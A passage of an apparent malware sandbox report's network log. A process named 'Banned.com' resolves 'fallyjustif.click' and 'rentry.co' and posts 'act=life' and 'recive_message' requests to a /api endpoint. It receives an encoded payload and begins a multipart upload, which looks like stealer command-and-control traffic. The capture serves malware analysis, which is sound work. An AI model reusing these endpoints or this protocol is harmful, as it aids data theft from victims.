                                                            Dec 28, 2024 21:36:10.535166025 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.575345993 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.575539112 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.575571060 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.623343945 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.623528004 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.623573065 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.623589993 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.667383909 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.667551041 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.667593002 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.715368032 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.715509892 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.763336897 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.774358034 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.774492979 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:10.774561882 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:10.987425089 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.409279108 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.409362078 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.409452915 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.409672976 CET49821443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.409689903 CET44349821172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.412817001 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.412862062 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:12.412936926 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.413228035 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:12.413238049 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:13.624362946 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:13.624453068 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:13.625614882 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:13.625619888 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:13.625822067 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:13.626933098 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:13.626967907 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:13.626992941 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.406955957 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.407023907 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.407254934 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:14.407329082 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:14.407345057 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.407356024 CET49831443192.168.2.5172.67.213.115
                                                            Dec 28, 2024 21:36:14.407360077 CET44349831172.67.213.115192.168.2.5
                                                            Dec 28, 2024 21:36:14.549663067 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:14.549700975 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:14.549801111 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:14.550246954 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:14.550261021 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:15.857098103 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:15.857196093 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:15.858777046 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:15.858784914 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:15.858984947 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:15.860179901 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:15.903327942 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662843943 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662880898 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662905931 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662929058 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662944078 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.662964106 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.662975073 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.663021088 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.663067102 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.663377047 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.663387060 CET44349836172.67.75.40192.168.2.5
                                                            Dec 28, 2024 21:36:16.663394928 CET49836443192.168.2.5172.67.75.40
                                                            Dec 28, 2024 21:36:16.663398981 CET44349836172.67.75.40192.168.2.5

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 28, 2024 21:35:06.913566113 CET6247553192.168.2.51.1.1.1
                                                            Dec 28, 2024 21:35:07.052226067 CET53624751.1.1.1192.168.2.5
                                                            Dec 28, 2024 21:35:55.362039089 CET5589553192.168.2.51.1.1.1
                                                            Dec 28, 2024 21:35:55.499284029 CET53558951.1.1.1192.168.2.5
                                                            Dec 28, 2024 21:36:14.410732031 CET6533253192.168.2.51.1.1.1
                                                            Dec 28, 2024 21:36:14.548464060 CET53653321.1.1.1192.168.2.5

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 28, 2024 21:35:06.913566113 CET192.168.2.51.1.1.10x442fStandard query (0)xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDiA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 21:35:55.362039089 CET192.168.2.51.1.1.10x6a2dStandard query (0)fallyjustif.clickA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 21:36:14.410732031 CET192.168.2.51.1.1.10x9ebcStandard query (0)rentry.coA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 28, 2024 21:35:07.052226067 CET1.1.1.1192.168.2.50x442fName error (3)xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDinonenoneA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 21:35:55.499284029 CET1.1.1.1192.168.2.50x6a2dNo error (0)fallyjustif.click172.67.213.115A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 21:35:55.499284029 CET1.1.1.1192.168.2.50x6a2dNo error (0)fallyjustif.click104.21.37.209A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 21:36:14.548464060 CET1.1.1.1192.168.2.50x9ebcNo error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 21:36:14.548464060 CET1.1.1.1192.168.2.50x9ebcNo error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 21:36:14.548464060 CET1.1.1.1192.168.2.50x9ebcNo error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • fallyjustif.click
                                                            • rentry.co

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549784172.67.213.1154436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:35:57 UTC264OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:35:57 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                            Data Ascii: act=life
                                                            2024-12-28 20:35:57 UTC1136INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:35:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=fhc305o6o1ln9jomsgsqh628ar; expires=Wed, 23 Apr 2025 14:22:36 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GWWVKRIsZEk%2FntwYH1rJto8M%2FiBuiW%2BG4FcvKJh%2FrDhN3jYrndZqGoVa%2B9PQnhWx4wg3YrpbuKi26BDuvpus%2BJLONAdfHnRrQAJn9cdkzbK2l7ucFEyoLbXwFDhIwvgY97FCeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9456fb19054401-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1710&rtt_var=649&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=908&delivery_rate=1676234&cwnd=233&unsent_bytes=0&cid=6ef43b0890a5092e&ts=1046&x=0"
                                                            2024-12-28 20:35:57 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                            Data Ascii: 2ok
                                                            2024-12-28 20:35:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549790172.67.213.1154436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:35:59 UTC265OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 49
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:35:59 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 26 6a 3d
                                                            Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl1new1&j=
                                                            2024-12-28 20:35:59 UTC1129INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:35:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=1qngvvl0pqftusc86m6e462kbs; expires=Wed, 23 Apr 2025 14:22:38 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFXc5Q2Y3NfhkHiFxObHMzTPSmaM2N8B%2FzHac7Beu4Dq1xYqCuzhKn4u1iaQgL4o7PlKCoAKy6ROLqrjdhylfyIKnw5q0MvmK2fFj8vJiW%2FiMynZS58jU5F%2BNAcpngmTkHXbAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9457082c3232e4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=950&delivery_rate=1589548&cwnd=162&unsent_bytes=0&cid=48086fa7ee858bfe&ts=757&x=0"
                                                            2024-12-28 20:35:59 UTC240INData Raw: 63 35 32 0d 0a 6f 51 67 69 39 6a 64 78 37 63 56 5a 4a 6c 38 48 66 6b 51 79 66 6c 49 66 72 66 74 4c 4e 42 48 48 6b 62 5a 58 70 41 38 69 52 49 72 61 4b 6c 54 55 44 55 58 42 35 79 70 44 66 54 30 4b 4e 6b 63 62 66 6a 33 4d 6e 32 6b 4f 64 36 62 39 78 54 4b 49 4c 56 51 70 71 4a 74 75 51 35 70 45 46 4d 48 6e 50 46 35 39 50 53 55 2f 45 42 73 38 50 5a 66 5a 4c 6c 35 7a 70 76 33 55 4e 73 39 67 55 69 6a 70 79 57 52 46 6e 6c 49 53 69 61 51 31 53 7a 70 69 47 79 56 59 45 44 74 79 78 5a 5a 70 47 44 4f 69 36 35 52 74 68 6b 4a 48 4d 4f 76 73 61 56 47 64 46 51 7a 42 76 6e 74 44 4d 53 56 45 5a 6c 4d 62 4d 48 50 4c 6e 79 42 63 65 61 2f 31 31 54 50 4f 66 30 73 69 34 73 6c 71 52 70 39 59 47 35 32 70 50 30 77 78 5a 42 45 6c 45 46 4a
                                                            Data Ascii: c52oQgi9jdx7cVZJl8HfkQyflIfrftLNBHHkbZXpA8iRIraKlTUDUXB5ypDfT0KNkcbfj3Mn2kOd6b9xTKILVQpqJtuQ5pEFMHnPF59PSU/EBs8PZfZLl5zpv3UNs9gUijpyWRFnlISiaQ1SzpiGyVYEDtyxZZpGDOi65RthkJHMOvsaVGdFQzBvntDMSVEZlMbMHPLnyBcea/11TPOf0si4slqRp9YG52pP0wxZBElEFJ
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 77 65 74 66 5a 63 52 59 67 6c 2f 44 46 4a 4e 4e 67 55 43 43 6f 33 43 52 5a 31 46 49 66 7a 2f 39 37 54 44 46 72 47 53 56 66 47 7a 46 39 33 5a 59 70 56 58 75 74 39 39 34 36 79 57 4a 4f 4c 4f 2f 4c 59 30 65 62 55 68 75 4a 71 44 67 45 63 79 55 62 50 68 42 45 63 46 33 66 6d 69 70 43 66 72 53 7a 79 33 76 66 4c 55 63 71 71 4a 73 71 52 70 70 55 48 6f 2b 31 4d 30 38 32 59 41 34 74 57 52 45 39 66 63 4b 54 4a 6c 56 7a 6f 76 6e 65 4f 73 78 70 54 53 76 75 77 32 6f 41 32 68 55 55 6c 2b 64 6a 42 42 35 67 44 43 46 63 43 6e 4a 48 6a 34 5a 6e 54 7a 4f 69 2f 35 52 74 68 6d 56 46 4a 65 76 49 5a 55 4f 63 58 67 47 50 74 54 31 4a 4f 48 63 61 49 31 34 57 4d 32 2f 46 6c 79 39 56 65 71 37 36 30 54 4c 43 4c 51 35 6d 37 39 73 71 47 4e 52 30 48 6f 53 72 4d 56 4d 39 4a 51 4e 6f 53 56
                                                            Data Ascii: wetfZcRYgl/DFJNNgUCCo3CRZ1FIfz/97TDFrGSVfGzF93ZYpVXut9946yWJOLO/LY0ebUhuJqDgEcyUbPhBEcF3fmipCfrSzy3vfLUcqqJsqRppUHo+1M082YA4tWRE9fcKTJlVzovneOsxpTSvuw2oA2hUUl+djBB5gDCFcCnJHj4ZnTzOi/5RthmVFJevIZUOcXgGPtT1JOHcaI14WM2/Fly9Veq760TLCLQ5m79sqGNR0HoSrMVM9JQNoSV
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 6b 79 39 5a 66 71 6d 7a 6d 6e 58 42 64 51 42 2b 71 4f 6c 70 56 4a 64 66 55 62 71 6b 4e 55 6f 36 63 31 77 35 48 67 56 77 65 73 50 5a 63 52 5a 2b 70 50 76 53 4a 38 6c 67 51 79 6a 6d 7a 47 39 50 6e 46 55 54 67 71 49 2f 54 7a 5a 6d 45 53 4a 43 46 6a 42 31 79 70 67 6a 58 44 50 72 73 39 4d 74 68 6a 55 41 46 2f 2f 49 4b 48 57 58 57 78 32 49 73 58 74 62 63 33 78 63 49 56 78 63 61 44 33 43 6b 53 78 54 66 4b 54 35 32 6a 44 4d 59 55 67 6f 36 39 46 6c 52 4a 52 5a 47 34 57 71 4e 55 41 31 62 42 63 74 56 68 77 78 64 34 2f 58 61 56 46 72 35 61 75 55 41 63 46 68 54 53 6d 71 39 6d 6c 4f 6d 6c 49 46 7a 37 68 31 58 58 31 69 45 47 59 49 58 44 78 30 7a 35 49 6a 55 6e 4f 69 2f 74 45 32 77 57 35 4e 49 65 4c 4e 62 55 53 59 58 42 36 4a 70 7a 78 41 4f 48 63 5a 4c 31 77 51 63 44 4f
                                                            Data Ascii: ky9ZfqmzmnXBdQB+qOlpVJdfUbqkNUo6c1w5HgVwesPZcRZ+pPvSJ8lgQyjmzG9PnFUTgqI/TzZmESJCFjB1ypgjXDPrs9MthjUAF//IKHWXWx2IsXtbc3xcIVxcaD3CkSxTfKT52jDMYUgo69FlRJRZG4WqNUA1bBctVhwxd4/XaVFr5auUAcFhTSmq9mlOmlIFz7h1XX1iEGYIXDx0z5IjUnOi/tE2wW5NIeLNbUSYXB6JpzxAOHcZL1wQcDO
                                                            2024-12-28 20:35:59 UTC183INData Raw: 54 32 38 73 39 4d 35 68 6a 55 41 4c 2b 48 52 5a 45 36 64 57 42 57 48 6f 44 56 4a 4e 6d 4d 58 49 56 63 61 50 58 58 43 6e 43 70 58 64 36 2f 68 31 7a 37 4d 59 45 70 6d 70 6f 4e 74 57 4e 51 4e 55 36 69 72 45 6c 51 6d 64 77 70 6d 54 31 49 70 50 63 69 56 61 51 34 7a 70 76 7a 64 4f 73 35 6c 54 79 6e 73 7a 57 78 47 6d 56 41 63 68 62 55 7a 53 6a 42 75 45 79 31 43 48 44 31 35 77 35 30 68 58 58 6e 6c 76 5a 51 79 33 69 30 59 5a 74 33 4f 5a 55 43 58 51 31 4f 51 36 53 49 45 4f 6d 6c 63 66 68 41 51 50 6e 33 41 6c 53 56 64 65 36 54 2f 32 6a 4c 44 5a 45 0d 0a
                                                            Data Ascii: T28s9M5hjUAL+HRZE6dWBWHoDVJNmMXIVcaPXXCnCpXd6/h1z7MYEpmpoNtWNQNU6irElQmdwpmT1IpPciVaQ4zpvzdOs5lTynszWxGmVAchbUzSjBuEy1CHD15w50hXXnlvZQy3i0YZt3OZUCXQ1OQ6SIEOmlcfhAQPn3AlSVde6T/2jLDZE
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 33 64 34 32 0d 0a 67 75 2b 73 4a 75 53 4a 56 62 48 49 36 6a 50 6b 45 35 59 68 67 67 58 31 78 2b 50 63 69 42 61 51 34 7a 69 74 54 68 64 2b 64 58 41 44 6d 6d 32 69 70 48 6d 42 56 4c 7a 36 73 34 53 44 56 71 47 69 39 63 46 6a 6c 32 77 35 49 74 57 6e 71 67 39 64 55 77 77 32 78 45 4b 75 4c 46 61 55 4f 62 57 68 79 48 35 33 55 45 4f 6e 31 63 66 68 41 35 4a 33 62 42 6e 32 6c 4a 50 62 79 7a 30 7a 6d 47 4e 51 41 71 34 63 56 73 52 5a 68 55 46 59 65 69 4d 30 41 38 59 78 6f 6c 58 78 67 31 66 4d 43 64 4a 56 68 35 70 50 4c 59 50 73 6c 6d 52 57 61 6d 67 32 31 59 31 41 31 54 76 71 51 74 55 79 31 70 58 44 6b 65 42 58 42 36 77 39 6c 78 46 6e 4b 33 2b 64 34 37 77 32 4a 46 4a 65 66 45 5a 30 61 59 58 78 71 48 6f 54 52 4e 4c 32 59 51 4b 46 63 53 50 48 50 43 6b 79 70 62 4d 2b 75
                                                            Data Ascii: 3d42gu+sJuSJVbHI6jPkE5YhggX1x+PciBaQ4zitThd+dXADmm2ipHmBVLz6s4SDVqGi9cFjl2w5ItWnqg9dUww2xEKuLFaUObWhyH53UEOn1cfhA5J3bBn2lJPbyz0zmGNQAq4cVsRZhUFYeiM0A8YxolXxg1fMCdJVh5pPLYPslmRWamg21Y1A1TvqQtUy1pXDkeBXB6w9lxFnK3+d47w2JFJefEZ0aYXxqHoTRNL2YQKFcSPHPCkypbM+u
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 57 70 4c 4c 75 50 4d 62 46 4b 59 57 77 47 4b 74 53 6b 45 63 79 55 62 50 68 42 45 63 45 76 49 69 54 6c 56 4d 5a 54 6c 31 79 50 4e 59 45 78 6d 39 34 31 7a 41 4a 4e 5a 55 39 66 6e 50 55 73 30 5a 68 4d 6e 57 52 41 39 65 4d 61 63 4b 46 42 33 72 2f 6e 55 4d 38 42 73 52 53 7a 72 77 6d 42 4a 6b 31 30 55 6a 4c 56 37 43 6e 31 69 42 47 59 49 58 42 6c 36 33 5a 63 35 46 6d 7a 72 36 70 51 79 79 69 30 59 5a 75 7a 4a 5a 55 53 54 57 52 57 4b 6f 54 5a 46 4d 6d 51 63 4b 56 51 58 4f 58 76 4f 6c 43 78 62 64 37 66 35 33 7a 72 4b 5a 45 77 72 71 49 30 71 52 34 77 56 53 38 2b 57 4e 6b 6f 7a 59 67 70 6d 54 31 49 70 50 63 69 56 61 51 34 7a 70 50 2f 62 4e 73 6c 75 51 79 66 69 30 58 68 4d 6e 56 30 57 67 36 77 31 51 69 39 6a 45 79 39 54 48 7a 6c 36 78 35 55 6a 56 58 54 6c 76 5a 51 79
                                                            Data Ascii: WpLLuPMbFKYWwGKtSkEcyUbPhBEcEvIiTlVMZTl1yPNYExm941zAJNZU9fnPUs0ZhMnWRA9eMacKFB3r/nUM8BsRSzrwmBJk10UjLV7Cn1iBGYIXBl63Zc5Fmzr6pQyyi0YZuzJZUSTWRWKoTZFMmQcKVQXOXvOlCxbd7f53zrKZEwrqI0qR4wVS8+WNkozYgpmT1IpPciVaQ4zpP/bNsluQyfi0XhMnV0Wg6w1Qi9jEy9THzl6x5UjVXTlvZQy
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 48 33 6a 58 4d 41 6b 31 6c 54 31 2b 63 39 54 54 74 69 47 69 68 43 47 54 5a 79 77 4a 41 67 55 6e 75 6d 38 39 41 78 77 57 68 44 4b 75 50 45 61 55 2b 51 58 42 32 47 71 48 73 4b 66 57 49 45 5a 67 68 63 45 57 62 4d 6c 53 51 57 62 4f 76 71 6c 44 4c 4b 4c 52 68 6d 35 4d 31 76 51 4a 35 54 46 34 71 68 4d 55 45 39 62 68 38 70 56 42 6f 30 63 73 2b 53 49 46 64 31 6f 50 6e 66 4d 38 74 75 52 69 43 6f 6a 53 70 48 6a 42 56 4c 7a 34 63 67 53 54 46 69 58 44 6b 65 42 58 42 36 77 39 6c 78 46 6e 69 70 39 39 4d 31 79 32 35 49 49 2b 7a 4a 62 30 43 63 52 78 75 50 6f 43 6c 57 50 57 77 5a 4b 6c 4d 63 4e 48 76 47 6e 79 70 53 4d 2b 75 7a 30 79 32 47 4e 51 41 4c 35 4d 52 44 52 34 38 56 44 4d 47 2b 65 30 4d 78 4a 55 52 6d 55 52 63 36 63 73 4b 61 4c 31 56 34 6f 50 6e 56 4d 73 35 67 55
                                                            Data Ascii: H3jXMAk1lT1+c9TTtiGihCGTZywJAgUnum89AxwWhDKuPEaU+QXB2GqHsKfWIEZghcEWbMlSQWbOvqlDLKLRhm5M1vQJ5TF4qhMUE9bh8pVBo0cs+SIFd1oPnfM8tuRiCojSpHjBVLz4cgSTFiXDkeBXB6w9lxFnip99M1y25II+zJb0CcRxuPoClWPWwZKlMcNHvGnypSM+uz0y2GNQAL5MRDR48VDMG+e0MxJURmURc6csKaL1V4oPnVMs5gU
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 6b 41 49 59 56 53 38 2f 67 4f 46 59 76 59 78 38 77 55 31 73 4f 51 2b 69 50 49 31 46 6a 6f 75 54 62 64 59 67 74 54 32 61 77 2b 69 70 4a 6b 30 34 43 6d 61 6f 72 51 33 31 61 55 6d 5a 49 58 47 67 39 2b 70 6f 6e 57 48 53 7a 34 70 6b 53 30 47 64 48 4e 75 2f 55 5a 51 44 61 46 52 58 50 2f 32 67 4b 66 57 45 4e 5a 67 68 4d 59 69 61 61 79 6e 34 47 49 62 71 39 7a 58 58 51 4c 52 68 30 70 6f 4e 34 41 4d 77 56 56 49 79 31 4b 55 49 2b 63 78 39 68 62 69 49 58 5a 38 4b 66 50 6b 64 4e 6d 2f 54 4f 4f 4d 42 36 55 57 72 39 77 47 52 4f 6b 30 4e 54 77 65 63 30 42 47 56 63 58 47 34 51 49 33 34 39 31 39 6c 78 46 6b 61 6d 2f 64 6f 79 30 48 77 4e 41 66 4c 4f 62 46 65 46 46 56 33 50 6f 58 73 63 62 79 74 63 49 6b 46 63 61 43 32 64 77 6e 77 46 4a 50 57 68 79 33 76 66 4c 56 5a 6d 73 4a
                                                            Data Ascii: kAIYVS8/gOFYvYx8wU1sOQ+iPI1FjouTbdYgtT2aw+ipJk04CmaorQ31aUmZIXGg9+ponWHSz4pkS0GdHNu/UZQDaFRXP/2gKfWENZghMYiaayn4GIbq9zXXQLRh0poN4AMwVVIy1KUI+cx9hbiIXZ8KfPkdNm/TOOMB6UWr9wGROk0NTwec0BGVcXG4QI34919lxFkam/doy0HwNAfLObFeFFV3PoXscbytcIkFcaC2dwnwFJPWhy3vfLVZmsJ
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 46 55 76 50 6b 6a 68 4b 4d 32 49 4b 4e 78 30 30 45 30 66 31 32 77 56 52 5a 75 66 48 30 79 58 58 5a 6b 30 71 71 49 30 71 52 74 51 4e 51 38 48 6e 50 31 56 39 50 55 78 30 43 30 6c 6a 4b 70 2f 4c 4e 68 68 71 35 65 57 55 62 5a 51 6a 41 44 53 6f 6d 79 6f 48 6c 30 63 42 69 61 51 74 52 33 70 62 49 67 46 65 47 7a 46 72 33 34 34 6d 61 45 32 77 38 4e 6f 37 77 58 74 52 5a 71 61 44 5a 51 44 4d 62 46 50 48 35 77 51 4b 66 58 31 63 66 68 41 70 4d 33 50 42 6e 6a 39 48 50 6f 4c 39 30 7a 54 51 66 56 63 70 71 49 30 71 52 74 51 4e 51 63 48 6e 50 31 56 39 50 55 78 30 43 30 6c 6a 4b 70 2f 4c 4e 68 68 71 35 65 57 55 62 5a 51 6a 41 44 53 6f 6d 79 6f 48 6c 30 63 42 69 61 51 74 52 33 70 62 49 67 46 65 47 7a 46 72 33 34 34 6d 47 56 32 54 30 75 6f 4c 30 32 35 4f 4b 4f 2f 56 65 77 44
                                                            Data Ascii: FUvPkjhKM2IKNx00E0f12wVRZufH0yXXZk0qqI0qRtQNQ8HnP1V9PUx0C0ljKp/LNhhq5eWUbZQjADSomyoHl0cBiaQtR3pbIgFeGzFr344maE2w8No7wXtRZqaDZQDMbFPH5wQKfX1cfhApM3PBnj9HPoL90zTQfVcpqI0qRtQNQcHnP1V9PUx0C0ljKp/LNhhq5eWUbZQjADSomyoHl0cBiaQtR3pbIgFeGzFr344mGV2T0uoL025OKO/VewD


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549797172.67.213.1154436460C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 20:36:01 UTC282OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=LMN9VRPDP5JIZR2K4
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 12831
                                                            Host: fallyjustif.click
